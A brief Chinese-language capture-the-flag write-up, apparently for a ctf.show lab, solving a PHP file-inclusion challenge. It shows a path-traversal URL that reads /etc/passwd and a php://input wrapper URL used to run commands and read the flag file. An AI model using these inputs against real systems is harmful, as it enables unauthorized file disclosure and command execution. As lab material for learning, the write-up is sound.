打开靶机
提示是文件包含漏洞
测试成功
https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd
此题考的是PHP伪协议+文件包含,实现任意命令执行
抓取数据包
https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input
开始试验,查询当前目录下的文件结构
查看ctf_go_go_go文件内容
成功拿到flag